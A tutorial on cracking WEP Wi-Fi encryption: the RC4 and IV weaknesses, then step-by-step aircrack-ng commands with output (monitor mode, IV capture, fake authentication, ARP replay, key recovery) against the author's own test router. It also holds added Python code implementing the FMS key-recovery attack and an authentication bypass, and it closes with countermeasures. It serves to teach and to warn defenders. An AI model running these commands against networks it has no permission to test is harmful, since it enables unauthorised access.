Contents

Introduction
Encryption
WEP Vulnerability
Tools
Step 1: Find Target
Step 2: Capture IVs
Step 3: Fake Authentication
Step 4: ARP Request Replay
Step 5: Crack the Key
Countermeasure

Introduction

Cracking WEP (Wired Equivalent Privacy) is an old topic, and it is genuinely hard to find an access point (AP) that still uses WEP nowadays. Working through the method and its steps is nevertheless a good way to learn Kali Linux, and it lays the groundwork for the attacks on WPA and WPA2. There are countless articles describing how to crack WEP step by step, but they seldom explain the theory. This article explains the WEP vulnerability first and then walks through the attack.

⛑️  Please be reminded that the aim of this article is to explain the network threat and how to eliminate it. Illegal activities are not encouraged. ⛑️

Encryption

Since a wireless signal is transmitted through the air, anyone within range can receive it, so the transmitted frames need to be encrypted. Symmetric encryption is the natural choice: the transmitter uses a shared key to encrypt the message, and the receivers use the same key to decrypt it. For details, please see the article about Cryptography.

A large amount of data is transmitted over a wireless network, so a short shared key on its own is not enough to encrypt it. Instead, the shared key is fed into a stream cipher (also called a key stream generator) that produces a long key stream, and each plaintext byte is XORed with the corresponding key-stream byte. WEP uses RC4 as its stream cipher.

[Figure: WEP encryption, RC4 keyed with IV || shared key]

But a stream cipher is easy to break if the same key stream is used for every message: XORing two ciphertexts that share a key stream cancels the key stream out and leaves the XOR of the two plaintexts. So WEP prepends a 24-bit number, the Initialization Vector (IV), to the shared key, and RC4 is seeded with the concatenation IV || shared key (64 bits for a 40-bit key, 128 bits for a 104-bit key). A new IV is chosen for every frame so that each frame gets a different key stream. That, plus a CRC-32 integrity check value encrypted along with the payload, is the whole WEP encryption algorithm. Note that 24 bits give only about 16.7 million IVs: on a busy network the IV space is exhausted within hours, by the birthday bound the first IV collision appears after a few thousand frames, and many cards simply restart the IV counter at zero after a reset.

The following diagram shows the procedure for a transmission from the AP to a client. Note that the IV is transmitted in the clear, so anyone who wants it can capture it together with the encrypted message. When a client sends data to the AP, the procedure is the same, except that the client uses an IV of its own choosing.

[Figure: WEP transmission from AP to client, IV sent in the clear]

WEP Vulnerability

A short history lesson first. RC4 was designed by Ron Rivest at RSA Data Security in 1987 and was originally an RSA trade secret. In 1994 its source code was posted anonymously on the Internet, and the reverse-engineered cipher became known as ARC4 or ARCFOUR; all of these names refer to the same algorithm. RC4 is widely used because it needs very few resources and is fast. Even though the algorithm is public, the cipher on its own is still hard to break without the key; the problems described below come from the way WEP uses it.

However, the way WEP glues the IV onto the shared key lets an attacker learn a small part of the key stream and, from it, a small part of the shared key. Every WEP data frame starts with the fixed LLC/SNAP header (0xAA 0xAA 0x03), so XORing the first ciphertext byte with 0xAA reveals the first key-stream byte of that frame. The first three bytes of the RC4 key are the IV, which is sent in the clear, and for certain "weak" IVs the RC4 key scheduling then leaks one byte of the shared key with a noticeable probability (around 5% per weak IV in the original FMS attack). Each captured frame therefore casts a vote for a key byte, and enough votes recover the whole key. So the direction of cracking WEP is to capture a large number of frames with distinct IVs and feed them to an analysis tool that computes the shared key. The success rate grows with the number of IVs collected. Here are the best-known statistical attacks on the shared key:

Method   Year   Success rate                        Remark
FMS      2001   50% with 4,000,000 IVs
                65% with 11,000,000 IVs
KoreK    2004   50% with 1,500,000 IVs
                95% with 5,000,000 IVs
PTW      2007   55% with 45,000 IVs                 The most common and efficient method nowadays,
                more than 95% with 80,000 IVs       but it only analyzes ARP frames.
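
As an added example that is not part of the original article, the following Python script implements the FMS attack described above against a constructed capture: it builds WEP frames for a made-up 40-bit key using the classic weak IVs (A, 255, X), recovers the first key-stream byte of each frame from the known SNAP header, and votes on each key byte in turn, backtracking over the best candidates (the "depth" that aircrack-ng reports) and verifying the result against the capture. The key, the IVs and the frames are constructed here, and the RC4 implementation is a plain textbook one, not aircrack-ng's code.

```python
"""Added example (not from the original article): the FMS weak-IV attack on WEP.

WEP seeds RC4 with IV || shared key, where the 3-byte IV is sent in the clear,
and every data frame starts with the fixed LLC/SNAP header 0xAA 0xAA 0x03, so
the first key-stream byte of every frame is known: z = c[0] ^ 0xAA.  For IVs of
the form (A, 255, X) with A = 3 + B, the RC4 key scheduling leaks key byte B
with a probability of roughly 5%.  One vote per such frame, taking the most
popular value, recovers the key byte by byte.  The shared key, the IVs and the
"captured" frames below are all constructed for this demonstration.
"""
from collections import Counter

SNAP_HEADER = bytes([0xAA, 0xAA, 0x03])  # known plaintext at the start of every WEP data frame


def rc4_ksa_prefix(key, steps):
    """Run the first `steps` iterations of the RC4 key-scheduling algorithm.
    Returns the partial permutation S and the running index j."""
    s = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s, j


def rc4_keystream(key, length):
    """Full RC4: complete key scheduling, then `length` bytes of PRGA output."""
    s, _ = rc4_ksa_prefix(key, 256)
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt_header(shared_key, iv):
    """What a sniffer sees for one frame: the IV in clear and the encrypted SNAP header."""
    ks = rc4_keystream(iv + shared_key, len(SNAP_HEADER))
    return iv, bytes(p ^ k for p, k in zip(SNAP_HEADER, ks))


def capture_weak_iv_frames(shared_key):
    """Constructed capture: one frame for every weak IV (3+B, 255, X) of every key byte B."""
    return [wep_encrypt_header(shared_key, bytes([3 + b, 255, x]))
            for b in range(len(shared_key)) for x in range(256)]


def vote_key_byte(frames, known_prefix):
    """FMS vote for key byte B = len(known_prefix), using the key bytes recovered so far."""
    a = 3 + len(known_prefix)  # position of the target byte inside IV || key
    votes = Counter()
    for iv, cipher in frames:
        s, j = rc4_ksa_prefix(iv + known_prefix, a)
        # "Resolved" state: S[1] + S[S[1]] == A means the first PRGA output will be
        # the value swapped into S[A] at KSA step A, unless a later step disturbs
        # S[1], S[S[1]] or S[A] (which is why most votes are noise).
        if s[1] < a and s[1] + s[s[1]] == a:
            z = cipher[0] ^ SNAP_HEADER[0]              # first key-stream byte of this frame
            votes[(s.index(z) - j - s[a]) & 0xFF] += 1  # K[A] = S^-1[z] - j - S[A]
    return votes


def key_is_correct(frames, key, samples=4):
    """Verify a candidate key by re-encrypting the known header of a few captured frames."""
    return all(wep_encrypt_header(key, iv)[1] == cipher for iv, cipher in frames[:samples])


def fms_crack(frames, key_len, depth=4):
    """Recover the key byte by byte.  Because ~95% of the votes are noise, the top
    candidate is occasionally wrong, so we backtrack over the `depth` best
    candidates (the "depth" column of aircrack-ng's output) and accept only a
    key that verifies against the capture."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if key_is_correct(frames, prefix) else None
        for candidate, _ in vote_key_byte(frames, prefix).most_common(depth):
            found = search(prefix + bytes([candidate]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    secret = b"K3y!5"  # constructed 40-bit WEP key; 104-bit keys work the same with more frames
    frames = capture_weak_iv_frames(secret)
    print(f"captured {len(frames)} frames, recovered key: {fms_crack(frames, len(secret))}")
```

With 256 weak IVs per key byte only about a dozen votes land on the right value, which is why the search verifies every full candidate before accepting it, and why a real attack needs the IV counts in the table above (or, with PTW, far fewer, but taken from ARP frames).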

Tools

Aircrack-ng is the best-known and most capable suite for cracking wireless shared keys, and it ships with Kali Linux. A wireless LAN card that supports monitor mode (and packet injection, needed for steps 3 and 4) is also required. The following brands and models are known to work with Kali Linux (Debian):

Brand     Model        Remark
Alfa      AWUS036H
Alfa      AWUS036NH
Alfa      AWUS036NHA
Alfa      AWUS051NH
Panda     PAU05        I am using this model. It is nice and small.
TP-Link   TL-WN722N    The new V2 hardware revision does not support Kali Linux yet. Be careful when buying.
Netgear   WG111v2

Step 1: Find Target

First, enable monitor mode on the wireless interface. A monitor-mode interface (wlan0mon) will be created.

root@KALI:~# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  491 NetworkManager
 4722 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Then scan for wireless networks and see whether any AP still uses WEP. Of course, you are unlikely to find one, so I have prepared a wireless router for testing. Note the BSSID (the MAC address of the AP), the channel and the ESSID.

root@KALI:~# airodump-ng wlan0mon

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:A5:BC:15:5D  -31        7        0    0  11  54e  WEP  WEP         Testing
 88:75:56:㊙️:㊙️:㊙️  -54        8        0    0   5  54e  WPA2 CCMP   PSK  CISCO
 C8:3A:35:㊙️:㊙️:㊙️  -68        3        1    0   8  54e  WPA2 CCMP   PSK  Sweet Dream
 C8:3A:35:㊙️:㊙️:㊙️  -69        3        1    0   8  54e  WPA2 CCMP   PSK  Whatthehell
 78:96:82:㊙️:㊙️:㊙️  -71        4        0    0   6  54e  WPA2 CCMP   PSK  Default
 

Since the target is on channel 11, restart monitor mode locked to channel 11 for the attack (the -c option of airodump-ng in the next step also sets the channel, but aireplay-ng needs the interface to stay on the AP's channel, so it is safest to lock it here).

root@KALI:~# airmon-ng stop wlan0mon

PHY     Interface       Driver          Chipset

phy0    wlan0mon        rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 station mode vif enabled on [phy0]wlan0)

                (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

root@KALI:~# airmon-ng start wlan0 11


PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       Ralink Technology, Corp. RT5372

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

Step 2: Capture IVs

Use airodump-ng -c 11 --bssid 00:24:A5:BC:15:5D -w output wlan0mon to capture frames from the target AP on channel 11 and save them in files whose names start with output (output-01.cap and so on). For a WEP network the #Data column counts the captured data frames with distinct IVs, which is the number that matters. Now we wait for enough IVs to launch the cracking.

CH  11 ][ Elapsed: 2 mins ][ 2017-05-28 21:27

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E

 00:24:A5:BC:15:5D  -36 100     1223       14    0   7  54e. WEP  WEP    OPN  T

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

 00:24:A5:BC:15:5D  9C:EF:D5:FE:4B:1B    0    1 - 1      0       66

Step 3: Fake Authentication

If we do not want to wait that long, we can generate traffic ourselves to force the AP to produce frames with fresh IVs. To do that we must be associated with the AP. But we do not have the shared key, so how can we associate? This is where the second vulnerability of WEP comes in.

First, let us look at how an AP accepts a client under WEP shared-key authentication. When a client wants to associate, it sends an authentication request to the AP. The AP replies with a random text (the challenge, 128 bytes) in the clear. The client picks an IV, generates a key stream from that IV and the shared key, encrypts the challenge with it, and sends the encrypted challenge together with the IV back to the AP. Finally, the AP uses the received IV and its own shared key to generate the same key stream and decrypts the encrypted challenge. If the result matches the original challenge, the AP concludes that the client holds the same shared key.

[Figure: WEP shared-key authentication challenge and response]

Unfortunately, an attacker who captures these frames sees both the challenge (in the clear) and the encrypted challenge, and XORing the two yields the key stream for that IV (not the shared key), together with the IV itself. Later the attacker sends his or her own authentication request to the AP, receives a new challenge, encrypts it with the recovered key stream and sends it back with the captured IV. The AP decrypts it correctly and accepts the client. The beauty of fake authentication is that the attacker fools the AP without ever knowing the shared key. Note that many WEP APs, including the one in this article (AUTH shows OPN above), use open system authentication instead: then there is no challenge at all, anyone can authenticate and associate, and WEP only protects the data frames that follow.
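
The exchange above, as an added example that is not part of the original article: a toy AP that performs shared-key authentication, an honest client that completes it, and an attacker that sniffs one handshake and then passes authentication without the key. To keep the example short, the key stream comes from a stand-in generator (SHAKE-128 over IV || key) rather than from RC4; the bypass does not depend on the cipher, only on the key stream being a fixed function of IV || key, so the AP decrypts the attacker's reply with exactly the key stream the attacker recovered. All keys, MAC addresses and IVs here are constructed.

```python
"""Added example (not from the original article): passing WEP shared-key
authentication with a replayed IV and key stream, never learning the key.

The key stream is a stand-in (SHAKE-128 over IV || key) instead of RC4; the
attack only needs the key stream to be determined by IV || key.  Every key,
station address, IV and challenge is constructed for this demonstration.
"""
import hashlib
import os

CHALLENGE_LEN = 128  # the 802.11 shared-key challenge text is 128 octets


def keystream(shared_key, iv, length):
    """Stand-in for RC4(IV || key): a deterministic key stream per (IV, key) pair."""
    return hashlib.shake_128(iv + shared_key).digest(length)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class AccessPoint:
    """Minimal AP side of the four-frame shared-key authentication."""

    def __init__(self, shared_key):
        self.shared_key = shared_key
        self.pending = {}        # station address -> outstanding challenge
        self.authenticated = set()

    def auth_request(self, station):
        """Frame 1 in, frame 2 out: a fresh random challenge, sent in the clear."""
        challenge = os.urandom(CHALLENGE_LEN)
        self.pending[station] = challenge
        return challenge

    def auth_response(self, station, iv, encrypted_challenge):
        """Frame 3 in: decrypt with the AP's own key and the IV the station chose."""
        expected = self.pending.pop(station, None)
        if expected is None:
            return False
        decrypted = xor(encrypted_challenge, keystream(self.shared_key, iv, CHALLENGE_LEN))
        ok = decrypted == expected
        if ok:
            self.authenticated.add(station)   # frame 4: success
        return ok


def honest_client(ap, station, shared_key, iv):
    """A legitimate station encrypts the challenge with the real key.
    Returns what a sniffer sees on the air: plaintext challenge, IV, ciphertext."""
    challenge = ap.auth_request(station)
    encrypted = xor(challenge, keystream(shared_key, iv, CHALLENGE_LEN))
    if not ap.auth_response(station, iv, encrypted):
        raise RuntimeError("honest client must pass authentication")
    return challenge, iv, encrypted


def recover_keystream(challenge, encrypted_challenge):
    """Attacker: plaintext XOR ciphertext is the key stream for that IV."""
    return xor(challenge, encrypted_challenge)


def fake_auth(ap, attacker, iv, recovered_ks):
    """Attacker: answer a fresh challenge with the replayed IV and recovered key stream."""
    challenge = ap.auth_request(attacker)
    return ap.auth_response(attacker, iv, xor(challenge, recovered_ks))


def demo():
    shared_key = b"Jannet.hk!@#$"          # constructed 104-bit key (same text as the article's)
    ap = AccessPoint(shared_key)
    # 1. a real client authenticates while the attacker sniffs the exchange
    challenge, iv, encrypted = honest_client(ap, "9c:ef:d5:00:00:01", shared_key, bytes([0x12, 0x34, 0x56]))
    # 2. the attacker derives the key stream for that IV without the key ...
    ks = recover_keystream(challenge, encrypted)
    # 3. ... and passes authentication for its own address with the same IV
    return fake_auth(ap, "9c:ef:d5:fe:4b:1b", iv, ks)


if __name__ == "__main__":
    print("fake authentication accepted:", demo())
```

The only defence the AP has in this exchange is the IV, and WEP never requires an IV to be fresh, so replaying the captured one is enough. aireplay-ng's fake authentication does the same thing against a shared-key AP when it is given the key stream from a captured handshake; against an open-system AP like the one in this article it just sends the plain authentication and association requests.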

Now open a new terminal to run the fake authentication: aireplay-ng -1 10 -a 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon, where 10 means the (re)association is repeated every 10 seconds, -a is the BSSID of the AP and -h is the MAC address of the attacker's interface. If the attack succeeds, the message "Association successful" is displayed.

root@KALI:~# aireplay-ng -1 10 -a 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon
17:40:56  Waiting for beacon frame (BSSID: 00:24:A5:BC:15:5D) on channel 11

17:40:56  Sending Authentication Request (Open System) [ACK]
17:40:56  Authentication successful
17:40:56  Sending Association Request [ACK]
17:40:56  Association successful :-) (AID: 1)

17:41:06  Sending Authentication Request (Open System) [ACK]
17:41:06  Authentication successful
17:41:06  Sending Association Request [ACK]
17:41:06  Association successful :-) (AID: 1)

Step 4: ARP Request Replay

We can generate ARP requests (please see the article on ARP for the theory). An ARP request is addressed to the broadcast address, so when the AP receives one it retransmits it to every station, and each retransmission is encrypted with a new IV that we capture and store. But how do we make the AP accept an ARP request if we cannot encrypt one ourselves? The same way as with fake authentication: we capture an encrypted ARP request from the air and inject it back into the network. WEP has no replay protection, so the AP treats the replayed frame as genuine and rebroadcasts it every time. And thanks to cryptographic experts we can recognise an ARP request even though it is encrypted: an ARP request always has the same fixed length and is sent to the broadcast address.

Open a new terminal and use aireplay-ng -3 -b 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon to run the ARP request replay. For the replay to work, at least one ARP request must appear on the network, which is normally the case on a live network. The test network, however, may have no traffic at all; in that case associate a legitimate client with the AP and trigger an ARP request with a ping.

root@KALI:~# aireplay-ng -3 -b 00:24:A5:BC:15:5D -h 9C:EF:D5:FE:4B:1B wlan0mon
21:29:38  Waiting for beacon frame (BSSID: 00:24:A5:BC:15:5D) on channel 7
Saving ARP requests in replay_arp-0528-212938.cap
You should also start airodump-ng to capture replies.
Read 93344 packets (got 48340 ARP requests and 26904 ACKs), sent 30077 packets...(499 pps)

Step 5: Crack the Key

Finally, use aircrack-ng to crack the shared key. Tens of thousands of IVs are needed even with PTW, but there is no need to collect them all before starting: cracking and capturing can run at the same time, because aircrack-ng keeps re-reading the growing capture file and retries with the new IVs whenever an attempt fails. So run the capture, the fake authentication, the ARP replay and the cracker together in separate terminals. With a good injection rate, one to two minutes is enough to recover a shared key.

Open a new terminal and run aircrack-ng -b 00:24:A5:BC:15:5D output*.cap; PTW is the default method. To use FMS/KoreK instead, add -K: aircrack-ng -K -b 00:24:A5:BC:15:5D output*.cap. In the output, each KB line is one key byte with the vote counts of its candidate values, and depth shows how far down the candidate list aircrack-ng had to go for that byte.

                                 Aircrack-ng 1.2 rc4


                 [00:02:42] Tested 741 keys (got 54980 IVs)

   KB    depth   byte(vote)
    0    3/ 13   A8(62464) DA(61696) 9A(61440) 1C(61184) 1E(61184)
    1    2/  1   AF(63488) 31(63232) 7F(62976) FF(62976) 82(62720)
    2    0/  1   19(78848) 03(62720) 0D(62720) 3C(62464) 45(62464)
    3    0/  2   87(76288) C4(67840) 66(64512) DD(64256) 2D(64000)
    4   22/  4   FC(59904) 08(59648) 11(59648) 3C(59648) 4D(59648)

     KEY FOUND! [ 4A:61:6E:6E:65:74:2E:68:6B:21:40:23:24 ] (ASCII: Jannet.hk!@#$)
        Decrypted correctly: 100%

Countermeasure

Obviously, WEP is thoroughly broken by these attacks and should no longer be used on any wireless network. Replace it with WPA2 (or WPA3 where supported) using AES-CCMP, with a strong passphrase for WPA2-Personal or, better, 802.1X (WPA2-Enterprise) authentication. If an old device can only do WEP, isolate it on its own network segment rather than weakening the whole WLAN.